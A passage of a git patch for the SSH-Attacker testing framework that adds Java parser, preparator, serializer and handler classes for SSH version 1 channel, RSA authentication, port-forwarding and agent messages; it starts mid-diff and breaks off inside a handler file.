b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenConfirmationMessageSSHV1Parser.java @@ -0,0 +1,41 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenConfirmationMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class ChannelOpenConfirmationMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelOpenConfirmationMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseChannel(ChannelOpenConfirmationMessageSSH1 message) { + int remoteChannel = parseIntField(4); + int localChannel = parseIntField(4); + message.setRemoteChannel(remoteChannel); + message.setLocalChannel(localChannel); + } + + @Override + protected void parseMessageSpecificContents(ChannelOpenConfirmationMessageSSH1 message) { + parseChannel(message); + } + + @Override + public void parse(ChannelOpenConfirmationMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenFailureMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenFailureMessageSSHV1Parser.java new file mode 100644 index 000000000..36773f114 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenFailureMessageSSHV1Parser.java @@ -0,0 +1,40 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class ChannelOpenFailureMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelOpenFailureMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseExitStatus(ChannelOpenFailureMessageSSH1 message) { + int remoteChannel = parseIntField(4); + message.setRemoteChannel(remoteChannel); + } + + @Override + protected void parseMessageSpecificContents(ChannelOpenFailureMessageSSH1 message) { + parseExitStatus(message); + } + + @Override + public void parse(ChannelOpenFailureMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthChallengeMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthChallengeMessageSSHV1Parser.java new file mode 100644 index 000000000..1233477c0 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthChallengeMessageSSHV1Parser.java @@ -0,0 +1,44 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthChallengeMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; +import java.math.BigInteger; + +public class RsaAuthChallengeMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public RsaAuthChallengeMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + @Override + protected void parseMessageSpecificContents(RsaAuthChallengeMessageSSH1 message) { + parseEncryptedChallengeModulus(message); + } + + @Override + public void parse(RsaAuthChallengeMessageSSH1 message) { + parseProtocolMessageContents(message); + } + + private void parseEncryptedChallengeModulus(RsaAuthChallengeMessageSSH1 message) { + + int encryptedChallengeBitLength = parseIntField(4); + message.setEncryptedChallengeBitLenght(encryptedChallengeBitLength); + BigInteger modulus = parseMultiprecision(); + message.setIdentityPublicModulus(ArrayConverter.bigIntegerToByteArray(modulus)); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthMessageSSHV1Parser.java new file mode 100644 index 000000000..6978568e3 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthMessageSSHV1Parser.java @@ -0,0 +1,50 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.PublicKeyFormat; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; +import java.math.BigInteger; + +public class RsaAuthMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public RsaAuthMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + @Override + protected void parseMessageSpecificContents(RsaAuthMessageSSH1 message) { + parseIdentityPublicModulus(message); + } + + @Override + public void parse(RsaAuthMessageSSH1 message) { + parseProtocolMessageContents(message); + } + + private void parseIdentityPublicModulus(RsaAuthMessageSSH1 message) { + + int identityModulusBitLength = parseIntField(4); + message.setIdentityPublicModulusBitLenght(identityModulusBitLength); + BigInteger modulus = parseMultiprecision(); + message.setIdentityPublicModulus(ArrayConverter.bigIntegerToByteArray(modulus)); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenConfirmationMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenConfirmationMessageSSHV1Preparator.java new file mode 100644 index 000000000..fb84632fa --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenConfirmationMessageSSHV1Preparator.java @@ -0,0 +1,35 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenConfirmationMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ChannelOpenConfirmationMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelOpenConfirmationMessageSSHV1Preparator(Chooser chooser, ChannelOpenConfirmationMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_MSG_CHANNEL_OPEN_CONFIRMATION); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getLocalChannel() == null || getObject().getRemoteChannel() == null) { + getObject().setLocalChannel(0); + getObject().setRemoteChannel(0); + } + LOGGER.debug(getObject().getRemoteChannel().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenFailureMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenFailureMessageSSHV1Preparator.java new file mode 100644 index 000000000..ccb046dc5 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenFailureMessageSSHV1Preparator.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ChannelOpenFailureMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelOpenFailureMessageSSHV1Preparator(Chooser chooser, ChannelOpenFailureMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_MSG_CHANNEL_OPEN_FAILURE); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getRemoteChannel() == null) { + getObject().setRemoteChannel(0); + } + LOGGER.debug(getObject().getRemoteChannel().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageChallengeSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageChallengeSSHV1Preparator.java new file mode 100644 index 000000000..b2d26acf4 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageChallengeSSHV1Preparator.java @@ -0,0 +1,30 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthChallengeMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RsaAuthMessageChallengeSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public RsaAuthMessageChallengeSSHV1Preparator(Chooser chooser, RsaAuthChallengeMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_SMSG_AUTH_RSA_CHALLENGE); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageSSHV1Preparator.java new file mode 100644 index 000000000..29cab3b74 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageSSHV1Preparator.java @@ -0,0 +1,30 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RsaAuthMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public RsaAuthMessageSSHV1Preparator(Chooser chooser, RsaAuthMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_AUTH_RSA); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenConfirmationMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenConfirmationMessageSSHV1Serializier.java new file mode 100644 index 000000000..2764728e5 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenConfirmationMessageSSHV1Serializier.java @@ -0,0 +1,36 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenConfirmationMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ChannelOpenConfirmationMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelOpenConfirmationMessageSSHV1Serializier(ChannelOpenConfirmationMessageSSH1 message) { + super(message); + } + + private void serializeExitStatus() { + LOGGER.debug("Remote Channel: " + message.getRemoteChannel().getValue()); + LOGGER.debug("Local Channel: " + message.getRemoteChannel().getValue()); + appendInt(message.getRemoteChannel().getValue(), DataFormatConstants.UINT32_SIZE); + appendInt(message.getLocalChannel().getValue(), DataFormatConstants.UINT32_SIZE); + } + + @Override + public void serializeMessageSpecificContents() { + serializeExitStatus(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenFailureMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenFailureMessageSSHV1Serializier.java new file mode 100644 index 000000000..1275d57d3 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenFailureMessageSSHV1Serializier.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ChannelOpenFailureMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelOpenFailureMessageSSHV1Serializier(ChannelOpenFailureMessageSSH1 message) { + super(message); + } + + private void serializeExitStatus() { + LOGGER.debug("Failed to open remotechannel " + message.getRemoteChannel().getValue()); + appendInt(message.getRemoteChannel().getValue(), DataFormatConstants.UINT32_SIZE); + } + + @Override + public void serializeMessageSpecificContents() { + serializeExitStatus(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthChallengeMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthChallengeMessageSSHV1Serializier.java new file mode 100644 index 000000000..07b15f582 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthChallengeMessageSSHV1Serializier.java @@ -0,0 +1,26 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthChallengeMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RsaAuthChallengeMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public RsaAuthChallengeMessageSSHV1Serializier(RsaAuthChallengeMessageSSH1 message) { + super(message); + } + + @Override + public void serializeMessageSpecificContents() {} +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthMessageSSHV1Serializier.java new file mode 100644 index 000000000..c8b062cf6 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthMessageSSHV1Serializier.java @@ -0,0 +1,26 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RsaAuthMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public RsaAuthMessageSSHV1Serializier(RsaAuthMessageSSH1 message) { + super(message); + } + + @Override + public void serializeMessageSpecificContents() {} +} From 428e031ca871b3f74ed8ae313b54e53a4bbb8a82 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 29 Feb 2024 14:09:00 +0100 Subject: [PATCH 147/176] Implementing more packettypes --- .../handler/AgentOpenMessageSSHV1Handler.java | 29 +++++ ...tRequestForwardingMessageSSHV1Handler.java | 34 ++++++ ...lCloseConfirmationMessageSSHV1Handler.java | 29 +++++ .../ChannelCloseMessageSSHV1Handler.java | 29 +++++ .../ChannelDataMessageSSHV1Handler.java | 29 +++++ ...PortForwardRequestMessageSSHV1Handler.java | 29 +++++ .../handler/PortOpenMessageSSHV1Handler.java | 29 +++++ .../handler/X11OpenMessageSSHV1Handler.java | 29 +++++ .../ssh1/message/AgentOpenMessageSSH1.java | 69 +++++++++++ .../AgentRequestForwardingMessageSSH1.java | 52 ++++++++ .../ChannelCloseConfirmationMessageSSH1.java | 69 +++++++++++ .../ssh1/message/ChannelCloseMessageSSH1.java | 69 +++++++++++ .../ssh1/message/ChannelDataMessageSSH1.java | 84 +++++++++++++ .../PortForwardRequestMessageSSH1.java | 97 +++++++++++++++ .../ssh1/message/PortOpenMessageSSH1.java | 115 ++++++++++++++++++ .../ssh1/message/X11OpenMessageSSH1.java | 84 +++++++++++++ .../parser/AgentOpenMessageSSHV1Parser.java | 39 ++++++ ...ntRequestForwardingMessageSSHV1Parser.java | 33 +++++ ...elCloseConfirmationMessageSSHV1Parser.java | 40 ++++++ .../ChannelCloseMessageSSHV1Parser.java | 40 ++++++ .../parser/ChannelDataMessageSSHV1Parser.java | 42 +++++++ .../PortForwardRequestMessageSSHV1Parser.java | 45 +++++++ .../parser/PortOpenMessageSSHV1Parser.java | 48 ++++++++ .../parser/X11OpenMessageSSHV1Parser.java | 43 +++++++ .../AgentOpenMessageSSHV1Preparator.java | 34 ++++++ ...questForwardingMessageSSHV1Preparator.java | 30 +++++ ...oseConfirmationMessageSSHV1Preparator.java | 34 ++++++ .../ChannelCloseMessageSSHV1Preparator.java | 34 ++++++ .../ChannelDataMessageSSHV1Preparator.java | 34 ++++++ ...tForwardRequestMessageSSHV1Preparator.java | 34 ++++++ .../PortOpenMessageSSHV1Preparator.java | 34 ++++++ .../X11OpenMessageSSHV1Preparator.java | 34 ++++++ .../AgentOpenMessageSSHV1Serializier.java | 34 ++++++ ...uestForwardingMessageSSHV1Serializier.java | 26 ++++ ...seConfirmationMessageSSHV1Serializier.java | 34 ++++++ .../ChannelCloseMessageSSHV1Serializier.java | 34 ++++++ .../ChannelDataMessageSSHV1Serializier.java | 38 ++++++ ...ForwardRequestMessageSSHV1Serializier.java | 39 ++++++ .../PortOpenMessageSSHV1Serializier.java | 41 +++++++ .../X11OpenMessageSSHV1Serializier.java | 38 ++++++ 40 files changed, 1758 insertions(+) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentOpenMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentRequestForwardingMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseConfirmationMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelDataMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortForwardRequestMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortOpenMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/X11OpenMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentOpenMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentRequestForwardingMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseConfirmationMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelDataMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/PortForwardRequestMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/PortOpenMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/X11OpenMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentOpenMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AgentRequestForwardingMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseConfirmationMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelCloseMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelDataMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortForwardRequestMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/PortOpenMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/X11OpenMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentOpenMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AgentRequestForwardingMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseConfirmationMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelCloseMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelDataMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortForwardRequestMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/PortOpenMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/X11OpenMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentOpenMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AgentRequestForwardingMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseConfirmationMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelCloseMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelDataMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortForwardRequestMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/PortOpenMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/X11OpenMessageSSHV1Serializier.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentOpenMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentOpenMessageSSHV1Handler.java new file mode 100644 index 000000000..73fb1880c --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentOpenMessageSSHV1Handler.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import 